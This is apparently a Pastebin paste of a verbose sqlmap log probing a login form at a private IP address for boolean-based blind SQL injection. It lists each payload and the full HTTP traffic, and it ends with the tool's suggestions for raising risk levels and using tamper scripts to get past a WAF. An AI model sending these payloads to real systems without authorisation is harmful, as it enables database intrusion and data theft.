Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- sqlmap -r Desktop/request.txt -p user --technique=B -v3 --proxy="http://localhost:8081" --string="failed" -v 6
- ___
- __H__
- ___ ___[)]_____ ___ ___ {1.1.2#stable}
- |_ -| . [.] | .'| . |
- |___|_ ["]_|_|_|__,| _|
- |_|V |_| http://sqlmap.org
- [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
- [*] starting at 13:23:01
- [13:23:01] [INFO] parsing HTTP request from 'Desktop/request.txt'
- [13:23:01] [DEBUG] not a valid WebScarab log data
- [13:23:01] [DEBUG] cleaning up configuration parameters
- [13:23:01] [DEBUG] setting the HTTP timeout
- [13:23:01] [DEBUG] setting the HTTP/SOCKS proxy for all HTTP requests
- [13:23:01] [DEBUG] creating HTTP requests opener object
- [13:23:01] [INFO] testing connection to the target URL
- [13:23:01] [TRAFFIC OUT] HTTP request [#1]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 27
- Connection: close
- user=abc&passwd=abc&debug=0
- [13:23:01] [DEBUG] declared web page charset 'utf-8'
- [13:23:02] [TRAFFIC IN] HTTP response [#1] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:22:59 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:02] [INFO] testing if the provided string is within the target URL page content
- [13:23:02] [TRAFFIC OUT] HTTP request [#2]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 27
- Connection: close
- user=abc&passwd=abc&debug=0
- [13:23:02] [TRAFFIC IN] HTTP response [#2] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:00 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:02] [PAYLOAD] abc,(),)),"'.
- [13:23:02] [TRAFFIC OUT] HTTP request [#3]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 55
- Connection: close
- user=abc%2C%28%29%2C%29%29%2C%22%27.&passwd=abc&debug=0
- [13:23:03] [TRAFFIC IN] HTTP response [#3] (200 ):
- Content-length: 7
- Set-cookie: username=abc%2C%28%29%2C%29%29%2C%22%27.; expires=Sat, 18-Mar-2017 11:23:01 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:01 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:01 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:01 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:03] [WARNING] heuristic (basic) test shows that POST parameter 'user' might not be injectable
- [13:23:03] [PAYLOAD] abc'bACOJS<'">YDycOO
- [13:23:03] [TRAFFIC OUT] HTTP request [#4]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Cookie: username=abc%2C%28%29%2C%29%29%2C%22%27.;ha21324debug=0;password=abc
- Content-length: 54
- Connection: close
- user=abc%27bACOJS%3C%27%22%3EYDycOO&passwd=abc&debug=0
- [13:23:03] [TRAFFIC IN] HTTP response [#4] (200 ):
- Content-length: 7
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:01 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:03] [INFO] testing for SQL injection on POST parameter 'user'
- [13:23:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [13:23:03] [PAYLOAD] abc) AND 9411=7381 AND (4828=4828
- [13:23:03] [TRAFFIC OUT] HTTP request [#5]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 73
- Connection: close
- user=abc%29%20AND%209411%3D7381%20AND%20%284828%3D4828&passwd=abc&debug=0
- [13:23:04] [TRAFFIC IN] HTTP response [#5] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:02 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:04] [PAYLOAD] abc) AND 5219=5219 AND (8008=8008
- [13:23:04] [TRAFFIC OUT] HTTP request [#6]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 73
- Connection: close
- user=abc%29%20AND%205219%3D5219%20AND%20%288008%3D8008&passwd=abc&debug=0
- [13:23:05] [TRAFFIC IN] HTTP response [#6] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:03 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:05] [PAYLOAD] abc AND 4377=5605
- [13:23:05] [TRAFFIC OUT] HTTP request [#7]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 47
- Connection: close
- user=abc%20AND%204377%3D5605&passwd=abc&debug=0
- [13:23:05] [TRAFFIC IN] HTTP response [#7] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:03 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:05] [PAYLOAD] abc AND 5219=5219
- [13:23:05] [TRAFFIC OUT] HTTP request [#8]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 47
- Connection: close
- user=abc%20AND%205219%3D5219&passwd=abc&debug=0
- [13:23:06] [TRAFFIC IN] HTTP response [#8] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:04 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:06] [PAYLOAD] abc') AND 8466=9551 AND ('JzGw'='JzGw
- [13:23:06] [TRAFFIC OUT] HTTP request [#9]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 85
- Connection: close
- user=abc%27%29%20AND%208466%3D9551%20AND%20%28%27JzGw%27%3D%27JzGw&passwd=abc&debug=0
- [13:23:06] [TRAFFIC IN] HTTP response [#9] (200 ):
- Content-length: 7
- Set-cookie: username=abc%27%29+AND+8466%3D9551+AND+%28%27JzGw%27%3D%27JzGw; expires=Sat, 18-Mar-2017 11:23:04 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:04 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:04 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:04 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:06] [PAYLOAD] abc') AND 5219=5219 AND ('gMck'='gMck
- [13:23:06] [TRAFFIC OUT] HTTP request [#10]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 85
- Connection: close
- user=abc%27%29%20AND%205219%3D5219%20AND%20%28%27gMck%27%3D%27gMck&passwd=abc&debug=0
- [13:23:07] [TRAFFIC IN] HTTP response [#10] (200 ):
- Content-length: 7
- Set-cookie: username=abc%27%29+AND+5219%3D5219+AND+%28%27gMck%27%3D%27gMck; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:05 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:07] [PAYLOAD] abc' AND 5602=1645 AND 'bRZU'='bRZU
- [13:23:07] [TRAFFIC OUT] HTTP request [#11]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 79
- Connection: close
- user=abc%27%20AND%205602%3D1645%20AND%20%27bRZU%27%3D%27bRZU&passwd=abc&debug=0
- [13:23:07] [TRAFFIC IN] HTTP response [#11] (200 ):
- Content-length: 7
- Set-cookie: username=abc%27+AND+5602%3D1645+AND+%27bRZU%27%3D%27bRZU; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:05 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:05 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:07] [PAYLOAD] abc' AND 5219=5219 AND 'jhIc'='jhIc
- [13:23:07] [TRAFFIC OUT] HTTP request [#12]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 79
- Connection: close
- user=abc%27%20AND%205219%3D5219%20AND%20%27jhIc%27%3D%27jhIc&passwd=abc&debug=0
- [13:23:08] [TRAFFIC IN] HTTP response [#12] (200 ):
- Content-length: 7
- Set-cookie: username=abc%27+AND+5219%3D5219+AND+%27jhIc%27%3D%27jhIc; expires=Sat, 18-Mar-2017 11:23:06 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:06 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:06 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:06 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:08] [PAYLOAD] abc%' AND 2219=9174 AND '%'='
- [13:23:08] [TRAFFIC OUT] HTTP request [#13]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 77
- Connection: close
- user=abc%25%27%20AND%202219%3D9174%20AND%20%27%25%27%3D%27&passwd=abc&debug=0
- [13:23:09] [TRAFFIC IN] HTTP response [#13] (200 ):
- Content-length: 7
- Set-cookie: username=abc%25%27+AND+2219%3D9174+AND+%27%25%27%3D%27; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:07 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:09] [PAYLOAD] abc%' AND 5219=5219 AND '%'='
- [13:23:09] [TRAFFIC OUT] HTTP request [#14]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 77
- Connection: close
- user=abc%25%27%20AND%205219%3D5219%20AND%20%27%25%27%3D%27&passwd=abc&debug=0
- [13:23:09] [TRAFFIC IN] HTTP response [#14] (200 ):
- Content-length: 7
- Set-cookie: username=abc%25%27+AND+5219%3D5219+AND+%27%25%27%3D%27; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, password=abc; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/, ha21324debug=0; expires=Sat, 18-Mar-2017 11:23:07 GMT; Max-Age=86400; path=/
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Location: search.php
- Date: Fri, 17 Mar 2017 11:23:07 GMT
- Content-type: text/html; charset=UTF-8
- success
- [13:23:09] [PAYLOAD] abc AND 8660=3998-- JPJo
- [13:23:09] [TRAFFIC OUT] HTTP request [#15]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 56
- Connection: close
- user=abc%20AND%208660%3D3998--%20JPJo&passwd=abc&debug=0
- [13:23:10] [TRAFFIC IN] HTTP response [#15] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:08 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:10] [PAYLOAD] abc AND 5219=5219-- lpPm
- [13:23:10] [TRAFFIC OUT] HTTP request [#16]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 56
- Connection: close
- user=abc%20AND%205219%3D5219--%20lpPm&passwd=abc&debug=0
- [13:23:10] [TRAFFIC IN] HTTP response [#16] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:08 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:10] [DEBUG] skipping some tests
- [13:23:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
- [13:23:10] [PAYLOAD] (SELECT (CASE WHEN (5261=7717) THEN 5261 ELSE 5261*(SELECT 5261 FROM INFORMATION_SCHEMA.PLUGINS) END))
- [13:23:10] [TRAFFIC OUT] HTTP request [#17]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 168
- Connection: close
- user=%28SELECT%20%28CASE%20WHEN%20%285261%3D7717%29%20THEN%205261%20ELSE%205261%2A%28SELECT%205261%20FROM%20INFORMATION_SCHEMA.PLUGINS%29%20END%29%29&passwd=abc&debug=0
- [13:23:11] [TRAFFIC IN] HTTP response [#17] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:09 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:11] [PAYLOAD] (SELECT (CASE WHEN (4640=4640) THEN 4640 ELSE 4640*(SELECT 4640 FROM INFORMATION_SCHEMA.PLUGINS) END))
- [13:23:11] [TRAFFIC OUT] HTTP request [#18]:
- POST /index.php HTTP/1.1
- Host: 192.168.0.5
- Accept-language: en-US,en;q=0.5
- Accept-encoding: gzip, deflate
- Referer: http://192.168.0.5/index.php
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- User-agent: Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0
- Content-length: 168
- Connection: close
- user=%28SELECT%20%28CASE%20WHEN%20%284640%3D4640%29%20THEN%204640%20ELSE%204640%2A%28SELECT%204640%20FROM%20INFORMATION_SCHEMA.PLUGINS%29%20END%29%29&passwd=abc&debug=0
- [13:23:12] [TRAFFIC IN] HTTP response [#18] (200 OK):
- Content-length: 6
- Vary: Accept-Encoding
- Uri: http://192.168.0.5:80/index.php
- Server: Apache/2.4.18 (Ubuntu)
- Connection: close
- Date: Fri, 17 Mar 2017 11:23:10 GMT
- Content-type: text/html; charset=UTF-8
- failed
- [13:23:12] [DEBUG] skipping some tests
- [13:23:12] [WARNING] POST parameter 'user' does not seem to be injectable
- [13:23:12] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Rerun without providing the option '--technique'. Also, you can try to rerun by providing a valid value for option '--string' as perhaps the string you have chosen does not match exclusively True responses. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
- [*] shutting down at 13:23:12
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement